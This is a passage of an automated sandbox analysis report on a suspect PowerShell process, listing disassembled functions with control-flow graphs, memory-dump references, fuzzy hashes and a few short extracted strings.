                                                                                          control_flow_graph 497 77017b8-77017da 498 77017e0-77017e5 497->498 499 7701969-770197e 497->499 500 77017e7-77017ed 498->500 501 77017fd-7701801 498->501 507 7701980-7701984 499->507 508 7701987-77019b5 499->508 503 77017f1-77017fb 500->503 504 77017ef 500->504 505 7701914-770191e 501->505 506 7701807-770180b 501->506 503->501 504->501 509 7701920-7701929 505->509 510 770192c-7701932 505->510 511 770184b 506->511 512 770180d-770181e 506->512 507->508 514 7701b04-7701b26 508->514 515 77019bb-77019c0 508->515 517 7701934-7701936 510->517 518 7701938-7701944 510->518 513 770184d-770184f 511->513 512->499 526 7701824-7701829 512->526 513->505 520 7701855-7701859 513->520 532 7701b28-7701b2d 514->532 533 7701b2f-7701b34 514->533 521 77019c2-77019c8 515->521 522 77019d8-77019dc 515->522 523 7701946-7701966 517->523 518->523 520->505 529 770185f-7701863 520->529 530 77019ca 521->530 531 77019cc-77019d6 521->531 527 77019e2-77019e4 522->527 528 7701ab4-7701abe 522->528 534 7701841-7701849 526->534 535 770182b-7701831 526->535 536 77019f4 527->536 537 77019e6-77019f2 527->537 539 7701ac0-7701ac9 528->539 540 7701acc-7701ad2 528->540 541 7701865-770186e 529->541 542 7701886 529->542 530->522 531->522 532->533 544 7701b44 533->544 545 7701b36-7701b42 533->545 534->513 546 7701833 535->546 547 7701835-770183f 535->547 548 77019f6-77019f8 536->548 537->548 550 7701ad4-7701ad6 540->550 551 7701ad8-7701ae4 540->551 552 7701870-7701873 541->552 553 7701875-7701882 541->553 549 7701889-7701911 542->549 554 7701b46-7701b48 544->554 545->554 546->534 547->534 548->528 556 77019fe-7701a16 548->556 557 7701ae6-7701b01 550->557 551->557 558 7701884 552->558 553->558 561 7701b4a-7701b50 554->561 562 7701b7c-7701b86 554->562 574 7701a30-7701a34 556->574 575 7701a18-7701a1e 556->575 558->549 565 7701b52-7701b54 561->565 566 7701b5e-7701b79 561->566 569 7701b90-7701b96 562->569 570 7701b88-7701b8d 562->570 565->566 571 7701b98-7701b9a 569->571 572 7701b9c-7701ba8 569->572 576 7701baa-7701bc1 571->576 572->576 582 7701a3a-7701a41 574->582 578 7701a20 575->578 579 7701a22-7701a2e 575->579 578->574 579->574 584 7701a43-7701a46 582->584 585 7701a48-7701aa5 582->585 588 7701aaa-7701ab1 584->588 585->588
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2426134958.0000000007700000.00000040.00000800.00020000.00000000.sdmp, Offset: 07700000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7700000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: }l$}l
                                                                                          • API String ID: 0-1599228476
                                                                                          • Opcode ID: 4c95dade2933c23c02c97afb3feff45be8a326a6213f9a94f8278db4ce44a94a
                                                                                          • Instruction ID: 4b63aa69c5dd69759d55f4cdf2a0cdce1ab4782ad241cb7e46f5dd7ca4510629
                                                                                          • Opcode Fuzzy Hash: 4c95dade2933c23c02c97afb3feff45be8a326a6213f9a94f8278db4ce44a94a
                                                                                          • Instruction Fuzzy Hash: 09B115B1B0424ADFDB148BA9C4006AEBBE6AFC6360F58C47AD505CB291DB31D945C7E1
                                                                                          Function 08A16420 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 661 8a16420-8a16463 662 8a1646b-8a16497 SetThreadToken 661->662 663 8a164a0-8a164bd 662->663 664 8a16499-8a1649f 662->664 664->663
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2429537642.0000000008A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_8a10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: ab6405ef2a2d6932a484a4bb1d60b0e87a223119979a4bd53af467c054fe1e19
                                                                                          • Instruction ID: e23de85f81dd0493af2757ff854a43e33c3d7747e37d700a7436417cf6e149ee
                                                                                          • Opcode Fuzzy Hash: ab6405ef2a2d6932a484a4bb1d60b0e87a223119979a4bd53af467c054fe1e19
                                                                                          • Instruction Fuzzy Hash: D91146B19006098FCB10DFAEC584B9EFBF4AF48324F248519D119A7310C7B4A844CFA5
                                                                                          Function 08A16428 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 667 8a16428-8a16497 SetThreadToken 669 8a164a0-8a164bd 667->669 670 8a16499-8a1649f 667->670 670->669
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2429537642.0000000008A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_8a10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: dca6ce8505961de610be1f6ac26564ffd1bdc0de9e8a6bb9617882ad2ffaf9ee
                                                                                          • Instruction ID: 2bb709391346acf2f229fbc00ca5d47fdc2202c09914182e6608626232d2e2bc
                                                                                          • Opcode Fuzzy Hash: dca6ce8505961de610be1f6ac26564ffd1bdc0de9e8a6bb9617882ad2ffaf9ee
                                                                                          • Instruction Fuzzy Hash: 7C11F2B59006098FDB10DF9AC984B9EFBF8AB88724F24841AD519A7310D7B4A944CFA5
                                                                                          Function 04A2F7C1 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 673 4a2f7c1-4a2f810 674 4a2f819-4a2f840 673->674 677 4a2f841 674->677 677->677
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: U
                                                                                          • API String ID: 0-3372436214
                                                                                          • Opcode ID: 62601c02d416eb8ef74af9c1e5d4b5608ca242adb9492bd1d605ead315963f94
                                                                                          • Instruction ID: ba251fe510624b28bdb2d0939f28e355ff3ae9471a5738572f03e4993f97409d
                                                                                          • Opcode Fuzzy Hash: 62601c02d416eb8ef74af9c1e5d4b5608ca242adb9492bd1d605ead315963f94
                                                                                          • Instruction Fuzzy Hash: 4D01D771D00B5A9BCB04CFE4C9846EDFBB1FF99300F24471AE005AA604EBB06685DB81
                                                                                          Function 04A278E1 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 678 4a278e1-4a278ee 680 4a278f0-4a278f6 678->680 681 4a278f8-4a278fc 678->681 680->681 682 4a2796a-4a2797d 681->682 683 4a278fe-4a27915 681->683 687 4a27985-4a27988 682->687 689 4a27990-4a279a0 687->689
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,({l
                                                                                          • API String ID: 0-1966167436
                                                                                          • Opcode ID: 791bce22f2da84869fc16db49101d417cbda5164bb90bea9b57b33ee1de203ed
                                                                                          • Instruction ID: 140916c81436b23bab20823d709494823aaec8dbb735aaca2467f71de4211bbb
                                                                                          • Opcode Fuzzy Hash: 791bce22f2da84869fc16db49101d417cbda5164bb90bea9b57b33ee1de203ed
                                                                                          • Instruction Fuzzy Hash: 53F0F635300204CFDB146BBDE85857D77E2EBC83257104A2DD61A9B781CE32ED439791
                                                                                          Function 04A2DC88 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 691 4a2dc88-4a2dcad 693 4a2dcb6 691->693 694 4a2dcaf 691->694 695 4a2dcbe-4a2dcc8 693->695 694->693 697 4a2dcca call 4a2dce8 695->697 698 4a2dcca call 4a2dcd9 695->698 696 4a2dcd0-4a2dcd3 697->696 698->696
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/Qn^
                                                                                          • API String ID: 0-455608422
                                                                                          • Opcode ID: a6b7b08cfa7d4bc8dd3564b5dd838052cad80112b1152b2a25f7838e6b4bfec3
                                                                                          • Instruction ID: 876c9d90d0c598b855928b21e8ff779c6e286b2e3059bd5a0e4f927eb1ca306c
                                                                                          • Opcode Fuzzy Hash: a6b7b08cfa7d4bc8dd3564b5dd838052cad80112b1152b2a25f7838e6b4bfec3
                                                                                          • Instruction Fuzzy Hash: 27F0E535609AD05BC716D32DA81089E7FA6CEC627131801DFD045EB612CE94DC0587E3
                                                                                          Function 04A2DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 699 4a2dc98-4a2dcad 701 4a2dcb6-4a2dcc8 699->701 702 4a2dcaf 699->702 705 4a2dcca call 4a2dce8 701->705 706 4a2dcca call 4a2dcd9 701->706 702->701 704 4a2dcd0-4a2dcd3 705->704 706->704
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/Qn^
                                                                                          • API String ID: 0-455608422
                                                                                          • Opcode ID: 86466099425dc5287a54034b99475c80d8f9303088a3460e2c959522a0ff60fb
                                                                                          • Instruction ID: 3c0b8d7a688e31c7cb157a30b81b79c53933cc3d64a6e41d49aa138379d531a2
                                                                                          • Opcode Fuzzy Hash: 86466099425dc5287a54034b99475c80d8f9303088a3460e2c959522a0ff60fb
                                                                                          • Instruction Fuzzy Hash: 8EE0C231700A24579615B72EA90085F7BDBDFC8675314442EE109C7701DEA8EC0147D5
                                                                                          Function 07703CE8 Relevance: .6, Instructions: 586COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 707 7703ce8-7703d0d 708 7703f00-7703f16 707->708 709 7703d13-7703d18 707->709 719 7703f18-7703f1e 708->719 720 7703f1f-7703f4a 708->720 710 7703d30-7703d34 709->710 711 7703d1a-7703d20 709->711 712 7703eb0-7703eba 710->712 713 7703d3a-7703d3c 710->713 715 7703d22 711->715 716 7703d24-7703d2e 711->716 721 7703ec8-7703ece 712->721 722 7703ebc-7703ec5 712->722 717 7703d4c 713->717 718 7703d3e-7703d4a 713->718 715->710 716->710 723 7703d4e-7703d50 717->723 718->723 719->720 724 7703f50-7703f55 720->724 725 77040ce-77040de 720->725 726 7703ed0-7703ed2 721->726 727 7703ed4-7703ee0 721->727 723->712 729 7703d56-7703d75 723->729 730 7703f57-7703f5d 724->730 731 7703f6d-7703f71 724->731 739 77040e0-77040e6 725->739 740 77040e7-77040ee 725->740 732 7703ee2-7703efd 726->732 727->732 762 7703d85 729->762 763 7703d77-7703d83 729->763 737 7703f61-7703f6b 730->737 738 7703f5f 730->738 735 7704080-770408a 731->735 736 7703f77-7703f79 731->736 741 7704097-770409d 735->741 742 770408c-7704094 735->742 743 7703f89 736->743 744 7703f7b-7703f87 736->744 737->731 738->731 739->740 748 77040f0-77040f5 740->748 749 77040f7-7704112 740->749 751 77040a3-77040af 741->751 752 770409f-77040a1 741->752 750 7703f8b-7703f8d 743->750 744->750 748->749 753 7704228-770424e 749->753 754 7704118-770411d 749->754 750->735 756 7703f93-7703fb2 750->756 757 77040b1-77040cb 751->757 752->757 777 7704250-7704255 753->777 778 7704257-770425d 753->778 759 7704135-7704139 754->759 760 770411f-7704125 754->760 792 7703fc2 756->792 793 7703fb4-7703fc0 756->793 769 77041da-77041e4 759->769 770 770413f-7704141 759->770 764 7704127 760->764 765 7704129-7704133 760->765 767 7703d87-7703d89 762->767 763->767 764->759 765->759 767->712 774 7703d8f-7703d96 767->774 772 77041f1-77041f7 769->772 773 77041e6-77041ee 769->773 775 7704151 770->775 776 7704143-770414f 770->776 782 77041f9-77041fb 772->782 783 77041fd-7704209 772->783 774->708 786 7703d9c-7703da1 774->786 779 7704153-7704155 775->779 776->779 777->778 780 770428b-7704295 778->780 781 770425f-7704281 778->781 779->769 788 770415b-770415d 779->788 790 7704297-770429c 780->790 791 770429f-77042a5 780->791 821 7704283-7704288 781->821 822 77042d5-77042fe 781->822 789 770420b-7704225 782->789 783->789 794 7703da3-7703da9 786->794 795 7703db9-7703dc8 786->795 796 7704177-770417e 788->796 797 770415f-7704165 788->797 800 77042a7-77042a9 791->800 801 77042ab-77042b7 791->801 802 7703fc4-7703fc6 792->802 793->802 803 7703dab 794->803 804 7703dad-7703db7 794->804 795->712 815 7703dce-7703dec 795->815 808 7704180-7704186 796->808 809 7704196-77041d7 796->809 805 7704167 797->805 806 7704169-7704175 797->806 811 77042b9-77042d2 800->811 801->811 802->735 812 7703fcc-7704003 802->812 803->795 804->795 805->796 806->796 816 7704188 808->816 817 770418a-7704194 808->817 835 7704005-770400b 812->835 836 770401d-7704024 812->836 815->712 834 7703df2-7703e17 815->834 816->809 817->809 837 7704300-7704326 822->837 838 770432d-770433e 822->838 834->712 854 7703e1d-7703e24 834->854 839 770400d 835->839 840 770400f-770401b 835->840 841 7704026-770402c 836->841 842 770403c-770407d 836->842 837->838 849 7704340-7704346 838->849 850 7704347-770435c 838->850 839->836 840->836 846 7704030-770403a 841->846 847 770402e 841->847 846->842 847->842 849->850 855 7704395-770439f 850->855 856 770435e-770437b 850->856 858 7703e26-7703e41 854->858 859 7703e6a-7703e9d 854->859 860 77043a1-77043a5 855->860 861 77043a8-77043ae 855->861 866 77043e5-77043ea 856->866 867 770437d-770438f 856->867 870 7703e43-7703e49 858->870 871 7703e5b-7703e5f 858->871 882 7703ea4-7703ead 859->882 863 77043b0-77043b2 861->863 864 77043b4-77043c0 861->864 868 77043c2-77043e2 863->868 864->868 866->867 867->855 875 7703e4b 870->875 876 7703e4d-7703e59 870->876 878 7703e66-7703e68 871->878 875->871 876->871 878->882
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2426134958.0000000007700000.00000040.00000800.00020000.00000000.sdmp, Offset: 07700000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7700000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f10a07f467fc7035d1e6511aac27046f6140c6e7e91e1281cff656c934c0aeb
                                                                                          • Instruction ID: a17398526a9b598c18187a136280a34b2a17be046e6da7c136f53e34eb1f814e
                                                                                          • Opcode Fuzzy Hash: 2f10a07f467fc7035d1e6511aac27046f6140c6e7e91e1281cff656c934c0aeb
                                                                                          • Instruction Fuzzy Hash: 581227B1B04245DFDB259B78C80076BBBE2AFC2290F1488BAD605DB691DB71DC45C7E2
                                                                                          Function 04A229F0 Relevance: .2, Instructions: 210COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1153 4a229f0-4a22a1e 1154 4a22a24-4a22a3a 1153->1154 1155 4a22af5-4a22b37 1153->1155 1156 4a22a3f-4a22a52 1154->1156 1157 4a22a3c 1154->1157 1159 4a22c51-4a22c61 1155->1159 1160 4a22b3d-4a22b56 1155->1160 1156->1155 1164 4a22a58-4a22a65 1156->1164 1157->1156 1162 4a22b5b-4a22b69 1160->1162 1163 4a22b58 1160->1163 1162->1159 1170 4a22b6f-4a22b79 1162->1170 1163->1162 1166 4a22a67 1164->1166 1167 4a22a6a-4a22a7c 1164->1167 1166->1167 1167->1155 1171 4a22a7e-4a22a88 1167->1171 1172 4a22b87-4a22b94 1170->1172 1173 4a22b7b-4a22b7d 1170->1173 1174 4a22a96-4a22aa6 1171->1174 1175 4a22a8a-4a22a8c 1171->1175 1172->1159 1176 4a22b9a-4a22baa 1172->1176 1173->1172 1174->1155 1177 4a22aa8-4a22ab2 1174->1177 1175->1174 1178 4a22baf-4a22bbd 1176->1178 1179 4a22bac 1176->1179 1180 4a22ac0-4a22af4 1177->1180 1181 4a22ab4-4a22ab6 1177->1181 1178->1159 1183 4a22bc3-4a22bd3 1178->1183 1179->1178 1181->1180 1185 4a22bd5 1183->1185 1186 4a22bd8-4a22be5 1183->1186 1185->1186 1186->1159 1189 4a22be7-4a22bf1 1186->1189 1190 4a22bf7 1189->1190 1191 4a22bf9 1190->1191 1192 4a22bfc-4a22c08 1190->1192 1191->1192 1192->1159 1194 4a22c0a-4a22c18 1192->1194 1196 4a22bf2-4a22bf5 1194->1196 1197 4a22c1a-4a22c24 1194->1197 1196->1190 1198 4a22c26 1197->1198 1199 4a22c29 1197->1199 1198->1199 1200 4a22c2e-4a22c38 1199->1200 1201 4a22c3d-4a22c50 1200->1201
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d4879f4a3eb2a32c76e8fa113c2d40f7012bd7d4fbeb521b27b37b68337b8a9
                                                                                          • Instruction ID: 7965ad42fd593ba10597c5db420289565ae9800f93f38b9646ffa5b34823ce75
                                                                                          • Opcode Fuzzy Hash: 5d4879f4a3eb2a32c76e8fa113c2d40f7012bd7d4fbeb521b27b37b68337b8a9
                                                                                          • Instruction Fuzzy Hash: 8E918874A00205CFCB15CF5DC594AAEBBB1FF88310B2486A9D915AB765C735FC52CBA0
                                                                                          Function 04A27728 Relevance: .2, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e262d0715b6a2c53ea97e4b06fd301f3843a927469b0347b67f731734182ce6
                                                                                          • Instruction ID: 6832a469a52ba5ec53a6744e7a96f474b4c4000cb7a596abf3a0da30bf79194d
                                                                                          • Opcode Fuzzy Hash: 0e262d0715b6a2c53ea97e4b06fd301f3843a927469b0347b67f731734182ce6
                                                                                          • Instruction Fuzzy Hash: 2F51DE387042159FD704CB6DD944A3ABBEAFFC9314B1585AAE505CB352EB31EC01DBA1
                                                                                          Function 04A2BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 46e18d0120c8909f67e813dfcc3ef0a4853f12f1b0feebeea07a2fd12d645ecf
                                                                                          • Instruction ID: a10966aaa4dfeecca71f7a947e6ad18e22219da481e79b91d4387535b24679b5
                                                                                          • Opcode Fuzzy Hash: 46e18d0120c8909f67e813dfcc3ef0a4853f12f1b0feebeea07a2fd12d645ecf
                                                                                          • Instruction Fuzzy Hash: B8611571E00218DFDB14DFA9C684A9DBBF1EF88310F15812AE819AB255EB74AC41CB60
                                                                                          Function 04A2BAB0 Relevance: .2, Instructions: 151COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e96e2c418930e5f1ed0300e81989bec0885b600b5f4c4593adf6e41141b482b0
                                                                                          • Instruction ID: ffe66a4417957c1b3b5bbf04efc4ba67dece8663c0f746268470a0bf681426d0
                                                                                          • Opcode Fuzzy Hash: e96e2c418930e5f1ed0300e81989bec0885b600b5f4c4593adf6e41141b482b0
                                                                                          • Instruction Fuzzy Hash: 54512271E00258DFCB14DFADC584A9DBBF1EF88310F15816AE819AB365EB74AC41CB60
                                                                                          Function 07703CCC Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2426134958.0000000007700000.00000040.00000800.00020000.00000000.sdmp, Offset: 07700000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7700000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5c6343e5017859ad2b9410240a31ff32f199a3bf4dc0bb3e049926b4cb33576c
                                                                                          • Instruction ID: 441edc2f820761d71447c2f039e028da58156a917098849f3f09859284ce6fb0
                                                                                          • Opcode Fuzzy Hash: 5c6343e5017859ad2b9410240a31ff32f199a3bf4dc0bb3e049926b4cb33576c
                                                                                          • Instruction Fuzzy Hash: B641B5F0A04342DBDB318A68C54076B7BE29FC5690F1849ADE9048F6D6D735EC45CBE2
                                                                                          Function 04A26FC8 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e7f5c5705234d9a8a690e5f212aa939dbe8488469bc7186caec7acd8a45cd72
                                                                                          • Instruction ID: 5a18b9fc32e869722b0f20c5e67ef1484695d04c8397541ad3dd9ebe8e25e7e4
                                                                                          • Opcode Fuzzy Hash: 1e7f5c5705234d9a8a690e5f212aa939dbe8488469bc7186caec7acd8a45cd72
                                                                                          • Instruction Fuzzy Hash: C9412C34B042148FEB08DFA8C554AAEBBF2EF8D311F1454A9D501AB391DB35ED05DB61
                                                                                          Function 04A22B00 Relevance: .1, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cca161e6d8663f857eec45493b07b0c77b4d9b77e956b3741aadf6b6e7a016d1
                                                                                          • Instruction ID: f248530eb272a92a186b445dd28be24e930cdc37466d7712db123fc650e4023e
                                                                                          • Opcode Fuzzy Hash: cca161e6d8663f857eec45493b07b0c77b4d9b77e956b3741aadf6b6e7a016d1
                                                                                          • Instruction Fuzzy Hash: 17414875A00615CFCB05CF59C598AAEFBB1FF48310B1185A9D915AB364C732FC51DBA0
                                                                                          Function 04A2C388 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b7de94922f17f810e25684b5c43502118a9a834f7a6fd94125ef718fd3acce1
                                                                                          • Instruction ID: 82ee9f31b795d0799482299eadaff3fc9f9825f6dd6683e04fe8f2238e6421a9
                                                                                          • Opcode Fuzzy Hash: 0b7de94922f17f810e25684b5c43502118a9a834f7a6fd94125ef718fd3acce1
                                                                                          • Instruction Fuzzy Hash: E8318D313006119FE709EB7CE854B9EBBA6EBC8215F04866DD609CB351DFB5AC05CBA1
                                                                                          Function 04A26FB9 Relevance: .1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68f738a15abcf43f2330ae1224400e0887af49095d0996222e3ba3d21540ce1e
                                                                                          • Instruction ID: e32fa768e58f6e20371a9103fa3a3d03d4ec3fe4fb765e84edf0fc2329d6de86
                                                                                          • Opcode Fuzzy Hash: 68f738a15abcf43f2330ae1224400e0887af49095d0996222e3ba3d21540ce1e
                                                                                          • Instruction Fuzzy Hash: 36311D38B04125CFDB14CFA9C654AAEBBF2EB8D311F145069E905AB391DB31ED05DB60
                                                                                          Function 04A2AE60 Relevance: .1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 295f277a301ccfeab5383c49db1f6e706865a5c1dc23ecc6a2afa5c9195e395a
                                                                                          • Instruction ID: a986dbd6fee02184181d9b77c1309546aa7fefa2980fdc820824e8fd2fd8b631
                                                                                          • Opcode Fuzzy Hash: 295f277a301ccfeab5383c49db1f6e706865a5c1dc23ecc6a2afa5c9195e395a
                                                                                          • Instruction Fuzzy Hash: 17315870E002199FDB48DFADC594AAEBBF2EF88305F10806DE505EB351EA749C019B60
                                                                                          Function 04A2AD28 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 884df277d1b0ff120494a13a01f9bc8b1fa324397cfd3dad56be77fe1c6ee271
                                                                                          • Instruction ID: 56038d36709f55dfc4cce50e24fd2d04ae9b54fe4cd9888858385ca6e64a90be
                                                                                          • Opcode Fuzzy Hash: 884df277d1b0ff120494a13a01f9bc8b1fa324397cfd3dad56be77fe1c6ee271
                                                                                          • Instruction Fuzzy Hash: 3831B0B4A002489FEF04EBA8D854AAE7BB2EF88304F1585ADC501BB395CA74AD018F51
                                                                                          Function 04A2AE70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bfad6dddfc8cbb340a38faa2620e010235343f701b76b03b509d80b7dce125b1
                                                                                          • Instruction ID: d935646bc8563002fe024e20745b1d5d36e3b728e99bbd32b953555a9d233766
